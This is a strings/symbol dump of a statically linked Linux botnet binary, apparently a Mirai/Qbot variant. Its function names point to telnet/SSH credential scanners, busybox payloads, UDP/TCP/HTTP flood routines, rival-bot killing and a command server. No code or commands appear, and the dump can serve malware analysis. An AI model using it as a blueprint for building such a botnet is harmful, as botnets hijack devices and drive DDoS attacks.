GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
client.c
i.4410
printchar
prints
printi
print
MiraiIPRanges
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
access.c
chdir.c
close.c
fork.c
getdtablesize.c
getpid.c
getppid.c
getrlimit.c
ioctl.c
kill.c
open.c
prctl.c
read.c
select.c
seteuid.c
setresuid.c
setreuid.c
setuid.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
perror.c
fprintf.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.3991
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4201
prefix.4202
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4203
qual_chars.4208
spec_chars.4204
spec_ranges.4205
spec_or_mask.4206
spec_and_mask.4207
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1161
_string_syserrmsgs.c
bcopy.c
strcasestr.c
strtok.c
next_start.1109
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2762
inet_ntoa.c
buf.2658
inet_makeaddr.c
gethostbyname.c
buf.4993
h.4992
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
Beeb
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.2832
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/vfork.S
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
sbrk.c
sigprocmask.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
memchr.c
memmove.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
dl-support.c
brk.c
__syscall_error.c
poll.c
fclose.c
fopen.c
fseeko.c
fseeko64.c
_adjust_pos.c
_fopen.c
_cs_funcs.c
fgets.c
fflush_unlocked.c
fgets_unlocked.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3116
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
fgetc_unlocked.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
_READ.c
_rfill.c
_trans2r.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
UpdateNameSrvs
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
MiraiHackaShit
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
telnetfindARandomIP
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
sysconf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
testtelnetPid
__GI_strcasecmp
advance_telstate
__GI_tolower
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
Phonepid
memmove
__bsd_signal
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
errno
getegid
read_until_response
__GI_sbrk
SSH_Usernames
zprintf
__GI___uClibc_init
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
mirairange
__libc_getpid
HackerScan1
wildString
__xpg_strerror_r
SendUDP
fcntl64
prctl
memcpy
TelnetScanner
testmiraiPid
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
perror
creat
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
phonepayload
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
reset_telstate
socket
select
_pthread_cleanup_pop_restore
Eleele
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
bcmPid
__GI_tcgetattr
__environ
mmap
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
SendSTD
__GI_getgid
srandom_r
echo_connect
_init
__GI_inet_ntoa_r
__GI_setstate_r
RandomPythonRange
strtol
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__malloc_state
__GI___C_ctype_b_data
__sigaddset
Payload
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
Mirai_Usernames
RemoveTempDirs
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
sshranges
environ
__GI_close
getBuild
telnetrange
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
Bot_Killer_Binarys
__GI_brk
__GI_nanosleep
BCMscanner
__GI_strtok
_stdio_openlist
telnettestrange
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
__GI_setreuid
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
__GI_memmove
setstate
__decode_dotted
HackaShit
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
miraifindARandomIP
__GI_isatty
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
miraiPid
rand
signal
read
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
__GI___C_ctype_b
Telnet_Passwords
__GI_gethostbyname_r
__GI_strncpy
__libc_send
PhoneScanner
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
Mirai_Passwords
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
getEndianness
ClearHistory
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
Busybox_Payload
fork
__stdio_rfill
strncat
setresuid
__GI_sleep
sigaction
__GI_gethostbyname
SendTCP
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
setreuid
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
MiraiScanner
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
BCMSCAN
initstate
fclose
__syscall_rt_sigaction
ntohs
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
seteuid
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
herror
strcmp
advances2
__nameserver
data_start
__GI_sysconf
__h_errno_location
Telnet_Usernames
matchPrompt
SSH_Passwords
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__vfork
__GI_mmap
contains_success
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
fails
commServer
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__libc_fork
__atexit_lock
scanPid
rand_cmwc
getBuildz
__GI_setresuid
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
contains_response
ipState
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
phone
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
PhoneScan
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
miraitestrange
__C_ctype_toupper_data
_dl_aux_init
__GI_perror
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
Temp_Directorys
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
miraitestfindARandomIP
__data_start
__GI_inet_addr
__GI_seteuid
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
fcntl
setuid
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__libc_connect
telnettestfindARandomIP
__GI_strlen
mainCommSock
pids
SendHTTP
vfprintf
strpbrk
_load_inttype
raise
useragents
free
sigprocmask
getsockname
